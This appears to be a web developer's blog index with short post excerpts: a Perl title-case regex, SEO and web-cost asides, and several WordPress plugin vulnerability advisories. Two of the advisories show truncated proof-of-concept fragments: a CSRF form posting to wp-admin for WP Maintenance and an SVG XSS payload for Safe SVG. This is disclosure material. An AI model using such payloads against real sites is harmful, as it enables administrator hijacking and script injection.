Blog
Title Case Regular Expression
You feed in a string to a regular expression and it comes out in Title Case. As Perl, PHP and ASP use regular expressions, this expression is useful with a little tinkering: $x =~ s/(\w+)/\u\L$1/g; $x =~ s/(\sand|of\s)/\L$1/ig if ($x =~ /\sand|of\s/i); Enjoy!
How Do You Pick A Good SEO?
The task of picking the right SEO agency is difficult. There are so many of them. It's the Wild West. When you give them your credit card, are they buying AdWords for your business or for themselves? A good SEO agency will never have a problem sharing all of their...
WP Maintenance <= 5.0.5 – Cross-Site Request Forgery to Stored Cross-Site Scripting
<html> <body> <form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST"> <input type="hidden" name="action" value="update_general" /> <input type="hidden" name="wp_maintenance_active" value="1" /> <input...
The Divi Migrator
I am going to build a plugin to satisfy that need. What do you think? What would you need a Divi Migrator / Integrator to do?
Turning A List Of MySQL Rows Into A Serialized PHP string
Turn a list of rows of from MySQL into a serialized PHP result
Safe SVG < 1.9.6 – XSS Protection Bypass
Video POC (for <= 1.9.4): https://drive.google.com/open?id=19-sin0HB97L0tPMUAaGjgE5KjP4lXSuw Create a SVG with payload below to trigger XSS: ```<?xml version="1.0" standalone="no"?> <svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"> <a...
Blog2Social < 5.9.0 – Cross-Site Scripting Issue
Publicly Published 2019-11-14 (about 23 hours ago) Added 2019-11-14 (about 15 hours ago) Last Updated 2019-11-14 (about 15 hours ago)
Email Subscribers & Newsletters < 4.2.3 – Multiple Issues
- Unauthenticated Export, leading to disclosure of subscribers data - Insecure Permissions on Dashboard and Settings - CSRF on Settings - Send Test Emails from the Administrative Dashboard as an Authenticated User (with a role of Subscriber and above) -...
IgniteUp < 3.4.1 – Multiple Issues
All issues can be triggered by unauthenticated users: - Arbitrary File Deletion - HTML injection & CSRF in email messages - Stored Cross-Site Scripting - Disclosure of subscribers' email address - Arbitrary subscriber deletion - Arbitrary plugin’s template switch
YIT Plugin Framework <= 3.3.8 – Authenticated Plugin's Settings Change
fixed in version 2.2.14 fixed in version 2.3.15 fixed in version 1.3.15 fixed in version 1.3.12 fixed in version 1.7.1 fixed in version 1.3.21 fixed in version 1.3.7 fixed in version 1.4.9 fixed in version 1.3.6 fixed in version 1.2.11 fixed in version 1.2.13 fixed in...
What is the Cost Of Web Development?
Design Rush has a piece on the cost of web development. Check it out!